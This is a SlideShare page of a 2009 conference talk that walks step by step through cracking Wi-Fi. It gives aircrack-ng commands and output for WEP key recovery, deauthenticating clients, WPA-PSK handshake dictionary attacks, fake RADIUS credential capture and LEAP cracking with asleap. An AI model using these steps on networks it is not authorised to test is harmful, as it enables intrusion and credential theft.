SlideShare a Scribd company logo

Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

Download as PPTX, PDF
barcamp.my
barcamp.my

Ahmad Siddiq Wi-Fi Ninjutsu Exploitation #barcampkl 2009

Technology
1 of 43
Special thanks to: Milw0rm | str0ke paperwork released on 24/2/2009 AHMAD JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
Contents Introduction  Conclusion steps for cracking WEP  Security of Wireless network  Owned the WPA-PSK / WPA2-PSK Key  Breaking the Simple Defenses  Exploiting Enterprise Wireless Connection (WPA-  Mac Filtering  TLS/TTLS/PEAP) Discover Hidden SSID  Exploiting CISCO LEAP  Sniffing Information on the Air  Get closer with cracking tool Refrences & Greetz to   Aircrack-ng suite  About Me / Questions  Decrypt packet with airdecap-ng  Decloak packet with airdecloak-ng  Owned the WEP Key with Simple Technique (No  Injection) Capturing method  Cracking method  Owned the WEP Key with Advanced Technique  (With Inject Method) Monitor Mode  Fake Authentication  ARP Replay Attack  Fragmentation Attack  Korek ChopChop Attack  Packetforge  ARP Request Replay with Interactive Attack  Cracking WEP key 
Introduction This presentation will introduce to you guys  the practical techniques used by hackers to break the wireless security. You really need to have some basic  knowledge of wireless operation to understand.
Security of Wireless Network WPA- WEP WPA2-PSK PSK WPA2-802.11x WPA-802.11x
Breaking the Simple Defenses Bypass MAC Filtering ? Hacker Wait wait.. Lemme check with my system first Wow! You’re LEGIT! You shall pass no0b
Breaking the Simple Defenses Bypass MAC Filtering Hacker no0b
Breaking the Simple Defenses Discover Hidden SSID Hacker Ayam Goreng (Hidden SSID)
Breaking the Simple Defenses Discover Hidden SSID - SSID broadcasting can be disabled in beacon frames ONLY - All other management frames (probe/responses, Hacker association and reassociations frames) contains the SSID or the network. So… what can I do is….. - Forge DISASSOCIATE frames, to a station seaming to come from the ACCESS POINT, so the station tries to reassociate (and send the SSID) - Reboot a client, so it reassociate when it initialize (if you have physical access to equipments) - RF jam (interferences) a client so it tries to reassociate (and expose SSID) - Install a fake Access Point near a client with weak signal so it tries to roam (probe requests will be sent).
Breaking the Simple Defenses Discover Hidden SSID #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz wlan0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] #airodump-ng wlan0 Hacker Ayam Goreng (Hidden SSID) OSHII--
Breaking the Simple Defenses Sniffing Information on the Air
Get Closer with the Cracking Tool Aircrack-ng suite Aircrack-ng suite is a set of tools for auditing wireless  networks. 4 main tools for today:  Airodump-ng – Used for capturing packets  Aireplay-ng – Used for injection  De-authentication  Fake authentication  Interactive packet replay  ARP replay  KoreK Chopchop  Fragment  Packetforge-ng – Used for creating packets  Aircrack-ng – Used for recovering keys 
Get Closer with the Cracking Tool Decrypt packets with airdecap-ng For WPA, airdecap-ng will return successful result  for only file which contains four ways handshake.
Get Closer with the Cracking Tool Decloak packet with airdecloak-ng Cloaking is a technique to disturb cracking WEP key process.  This technique is done by injecting packets which are encrypted  with random WEP key to the network, these packets are called quot;chaffquot;. If the attacker capture these packet and do the cracking, The result will be wrong or there is no result returned. However, the aircrack team have developed the tool to deal with  this technique, it is called quot;airdecloak-ngquot;. #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap This command return two files:  - workshop-01-filtered.cap: contain the filtered packets from specific  bssid - workshop-01-cloaked.cap: contain the cloaked packets from specific  bssid
Get Closer with the Cracking Tool Aircracking 101 PTW Attack  (-z) (aircrack-ng -z capture.cap), Only work for WEP 64/128 bits,  Require ARP request/replay packet that you must dump all packet from airodump-ng Dictionary Attack  (WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap)  Fudge Attack  (-f) Once hit 2 millions IVs, Try fudge factor to quot;-f 4quot;. Retry,  increasing the fudge factor by adding 4 to it each time. All the while, keep collecting data. Remember the golden  rule, quot;The More IVs the Betterquot;
Pwning the WEP key WEP FFFFFFFFFUUUUUUUUUUUUU-- Hacker
Owned the WEP Key with Simple Technique (No Injection) Lets assume that the network has a high-traffic so  we don’t need to do all those injection stuffs and so on. Preparation :  A device which supports monitor mode and can inject  packets to the network. MY Preparation:  5 years old laptop – AMD Turion64 1.6GHz 256MB  DDR (still working harmoniously despite…)  Ubuntu Intrepid Ibex 8.10  Broadcomm chipset running legacy b43 driver.
Owned the WEP Key with Simple Technique (No Injection) Capturing Method 64-bits key – 50,000 IV packets  128-bits key – 150,000 IV packets  #airodump-ng –w workshop rausb0 ------------------------------------------------------------------------------------------ [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop BSSID STATION PWR Rate Lost Packets Probes xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747 ------------------------------------------------------------------------------------------
Owned the WEP Key with Simple Technique (No Injection) Cracking Method #aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap -b xx:xx:xx:xx:xx:xx is the MAC address of target access point The successful cracking result is following: --------------------------------------------------------------- Opening workshop-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% ---------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) Lets assume that the network has no traffic at all.  We can conclude about the requirements of chosen  packet for injection as following. The MAC address is associated to access point. (we can  do this by fake authentication) Send from client to access point. (the “To DS” flag is set to  1) The destination MAC address is broadcasted.  (FF:FF:FF:FF:FF:FF) The well-known packet which covers all requirements  is ARP request broadcast. We can divide the situation for injection technique into  2 scenarios. The network has ARP request.  The network has no ARP request. 
Owned the WEP Key with Advanced Technique (With Inject Method) Monitor mode Using airmon-ng to set your wifi card to Monitor Mode  and prepare for packet injection. #airmon-ng start wlan0 11 Setting wlan0 to Monitor mode on channel 11, We must  specify the same channel as the target AP channel. Troops. Prepare for assault! Hacker Affirmative I Choose YOU!
Owned the WEP Key with Advanced Technique (With Inject Method) Fake Authentication We can do fake authentication by the following command:  #aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –a xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card If we get successful result, our MAC address will associate  with particular access point. ------------------------------------------ 00:00:00 Sending Authentication Request 00:00:00 Authentication successful 00:00:00 Sending Association Request 00:00:00 Association successful :-) ------------------------------------------ After succeeding in fake authentication, we have to determine  what type of network we are faced with and pick the appropriate steps to deal with it.
Owned the WEP Key with Advanced Technique (With Inject Method) ARP Replay Attack We can use ARP replay attack by following  command: #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –b xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card Aireplay-ng will detect ARP request and use it  to perform replay attack automatically. ------------------------------------------------------------------------------------ 21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 Saving ARP requests in replay_arp-0223-210620.cap You should also start airodump-ng to capture replies. Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps) ------------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack Fragment attack is used to generate key  stream in a size of 1500 bytes. So, we can use this key stream to create a packet which has size up to 1500 bytes. The command for fragment attack is: #aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack The system responds with this:  ------------------------------------------------------------------------------- 21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 21:21:07 Waiting for a data packet... Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r 0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8* 0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c 0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z 0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z. Use this packet ? -------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack We just have to answer yes  ----------------------- Use this packet ? y ----------------------- And the successful process looks like this:  ---------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-212107.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0223-212107.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream ----------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) Korek ChopChop Attack We are able to use chopchop attack with this command:  #aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng will pick a packet for decrypting. we can should any  packet which has BSSID like our target. -------------------------------------------------------------------------------------- 21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N 0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. 0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K.... 0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. 0x0050: b09b f0f1 8b04 fc1c 0b72 .........r Use this packet ? ----------------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) Korek ChopChop Attack Just answer yes  ----------------------- Use this packet ? y ----------------------- And then the system will do the decrypting  --------------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-211242.cap Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms And so on ... The AP appears to drop packets shorter than 40 bytes. Enabling standard workaround: IP header re-creation. Saving plaintext in replay_dec-0223-211410.cap Saving keystream in replay_dec-0223-211410.xor Completed in 21s (2.48 bytes/s) ---------------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) Packetforge To create encrypted packet form PRGA (XOR)  that obtained from the chopchop or fragment attack. #Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y replay_dec-0223-211410.xor –w arp The result is:  ---------------------- Wrote packet to: arp ---------------------- From this command, we get ARP request packet  in file named “arp”.
Owned the WEP Key with Advanced Technique (With Inject Method) ARP Request Replay with Interactive Attack We use aireplay to inject arp request packet to access  point by following command: #aireplay-ng -2 –r arp rausb0 And…  ----------------------------------------------------------------------------------- Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:21:27:C0:07:71 0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q 0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4 0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; 0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ 0x0040: 66bf 700e f.p. Use this packet ? -----------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method) ARP Request Replay with Interactive Attack Yes is the only option available  ----------------------- Use this packet ? y ----------------------- Now aireplay-ng starts injecting the packets  ------------------------------------------------------- Saving chosen packet in replay_src-0223-211755.cap You should also start airodump-ng to capture replies. Sent 1200 packets...(499 pps) ------------------------------------------------------- And don’t forget to start airodump-ng 
Owned the WEP Key with Advanced Technique (With Inject Method) Cracking WEP Key #aircrack-ng –z capture1.cap (PTW Attack) The successful cracking result is following: --------------------------------------------------------------- Opening capture1.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% ---------------------------------------------------------------
Conclusion Scripts for Cracking WEP $AP is Access Point MAC Address  $WIFI is WIFI Card MAC Address  airmon-ng start wlan0 11 (Must specific channel of Monitor Mode) airodump-ng -c 11 -w capture1.cap wlan0 aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 aireplay-ng -4 -b $AP -h $WIFI wlan0 If Its Not Working!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay.xor -w arp aireplay-ng -2 -r arp wlan0 aircrack-ng -z capture1.cap
Owned the WPA-PSK/WPA2-PSK Key The idea for cracking Pre-shared key is to  gather four ways handshake packets.
Owned the WPA-PSK/WPA2-PSK Key We are able to do this by de-authenticate  associated client. This way will force the client to perform re-  authentication and we can get four ways handshake from this process. The command for de-authentication is:  #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
Owned the WPA-PSK/WPA2-PSK Key #aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap Opening test-02.cap Read 252 packets. # BSSID ESSID Encryption 1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) Choosing first network as target. Opening workshop-02.cap Reading packets, please wait... Aircrack-ng 1.0 rc1 r1085 [00:00:00] 0 keys tested (0.00 k/s) KEY FOUND! [ TheFuckinWPAKey ] Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP) Most companies turned to use public key encryption with  wireless network and they think that it is perfectly safe. But the tricky hacker still attacks this system by spoofing  certificate. This attacking method takes an advantage of client incaution.  Many clients accept certification without considering whether it is genuine certificate or not. This make attacker impersonate himself to be radius server  and login credential information from victims. We can use freeradius as fake radius server combining with  WPE patch to enable login credential information on freeradius server additional information:  http://www.willhackforsushi.com/FreeRADIUS_WPE.html
Exploiting CISCO LEAP Cisco proprietary Lightweight Extensible  Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities by supporting centralized, user- based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible  authentication protocol (EAP) types specified by 802.1X. We found that the usernames that are sent to  Radius are plaintexts, that captured from Wireshark but the password was encrypted. So It's also vulnerable to exploit… (insert evil 
Exploiting CISCO LEAP asleap is a tool designed to recover weak  LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. asleap can perform:   Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture  Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED Download Here: http://asleap.sourceforge.net/ 
Exploiting CISCO LEAP First step, Use asleap to produce the  necessary database (.dat) and index files (.idx) #./genkeys -r dictionary -f dict.dat -n dict.idx dict = Our wordlist/dictionary file, with one word per line dict.dat = Our new output pass+hash file (generated as a result of running this command) dict.idx = Our new output index filename (generated as a result of running this command) ----------------------------------------------------------------------- genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com> Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second Starting sort (be patient) ...Done. Completed sort in 0 compares. Creating index file (almost finished) ...Done. –----------------------------------------------------------------------
Exploiting CISCO LEAP The final step in recovering our weak LEAP password is  to run the asleap command with our newly created .dat and .idx files: #./asleap -r data/leap.dump -f dict.dat -n dict.idx leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used) dict.dat = Our output pass+hash file (generated with genkeys, see above) dict.idx = Our new output index filename (generated with genkeys, see above)
Exploiting CISCO LEAP So… what are we waiting for?  #./asleap -r data/leap.dump -f dict.dat -n dict.idx ----------------------------------------------------------------------- asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> Using the passive attack method. Captured LEAP exchange information: username: qa_leap challenge: 0786aea0215bc30a response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6 hash bytes: 4a39 NT hash: a1fc198bdbf5833a56fb40cdd1a64a39 password: qaleap Closing pcap ... ----------------------------------------------------------------------- Now ASLEAP 2.2, which includes the “-C” and “-R” options to specify the  hex-delimited bytes for the challenge and the response (respectively). Using this option, Asleap becomes a generic MS-CHAPv2 cracking tool, and can be applied anytime you have a MS-CHAPv2 packet capture available.
References & Greetz to PaulDotCom Forum  http://www.darkoperator.com/scripts  http://trac.metasploit.com/wiki/Karmetasploit  http://aircrack-ng.org/doku.php  http://www.citec.us  http://www.milw0rm.com  Greetz to the CWH Underground team:  Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter,  Conan, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke, citec.us, milw0rm.com 
About Me / Questions I’m Siddiq, 19.   Currently pursuing Degree in Biochemistry at Technology Park Malaysia College.  A retarded lazy part-time web programmer @ I- don’t-know-anything-about-IT  Currently looking for a real part-time job.  mysiddiq@gmail.com Thanks for attending.  Questions? 

Recommended

Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Mandeep Jadon
 
Cracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary AttacksCracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary Attacksn|u - The Open Security Community
 
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityFeb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityCasey Dunham
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Wpa3
Wpa3Wpa3
Wpa3Bhavya Dashora
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 

Recommended

Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Mandeep Jadon
 
Cracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary AttacksCracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary Attacksn|u - The Open Security Community
 
Feb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityFeb-8-2012-Breaking-Wireless-Security
Feb-8-2012-Breaking-Wireless-SecurityCasey Dunham
 
How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Wpa3
Wpa3Wpa3
Wpa3Bhavya Dashora
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyNapier University
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networksSahil Rai
 
Kracking WPA2
Kracking WPA2Kracking WPA2
Kracking WPA2BU - PG Master Computing Conference
 
WIFI Hacking
WIFI HackingWIFI Hacking
WIFI HackingSuraj Bohara
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hackingHarshit Varshney
 
Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linuxHelder Oliveira
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingarushi bhatnagar
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
WPA 3
WPA 3WPA 3
WPA 3diggu22
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
Pentesting
PentestingPentesting
PentestingHenrik Jacobsen
 
The New Landscape of Airborne Cyberattacks
The New Landscape of Airborne CyberattacksThe New Landscape of Airborne Cyberattacks
The New Landscape of Airborne CyberattacksPriyanka Aash
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kalin|u - The Open Security Community
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless HackingVIKAS SINGH BHADOURIA
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksChema Alonso
 
Brute forcing Wi-Fi Protected Setup
Brute forcing Wi-Fi Protected SetupBrute forcing Wi-Fi Protected Setup
Brute forcing Wi-Fi Protected SetupScientia Groups
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Understanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsUnderstanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsAirTight Networks
 
Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networksguestf2e41
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationPrathan Phongthiproek
 

More Related Content

What's hot

Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networksSahil Rai
 
Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linuxHelder Oliveira
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
The New Landscape of Airborne Cyberattacks
The New Landscape of Airborne CyberattacksThe New Landscape of Airborne Cyberattacks
The New Landscape of Airborne CyberattacksPriyanka Aash
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksChema Alonso
 
Brute forcing Wi-Fi Protected Setup
Brute forcing Wi-Fi Protected SetupBrute forcing Wi-Fi Protected Setup
Brute forcing Wi-Fi Protected SetupScientia Groups
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Understanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsUnderstanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsAirTight Networks
 

What's hot (20)

WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networks
 
Kracking WPA2
Kracking WPA2Kracking WPA2
Kracking WPA2
 
WIFI Hacking
WIFI HackingWIFI Hacking
WIFI Hacking
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 
Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linux
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
WPA 3
WPA 3WPA 3
WPA 3
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Pentesting
PentestingPentesting
Pentesting
 
The New Landscape of Airborne Cyberattacks
The New Landscape of Airborne CyberattacksThe New Landscape of Airborne Cyberattacks
The New Landscape of Airborne Cyberattacks
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless Hacking
 
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless NetworksLiving in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
Living in the Jungle: Legitimate users in Legitimate Insecure Wireless Networks
 
Brute forcing Wi-Fi Protected Setup
Brute forcing Wi-Fi Protected SetupBrute forcing Wi-Fi Protected Setup
Brute forcing Wi-Fi Protected Setup
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 
Understanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and SolutionsUnderstanding WiFi Security Vulnerabilities and Solutions
Understanding WiFi Security Vulnerabilities and Solutions
 

Similar to Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networksguestf2e41
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
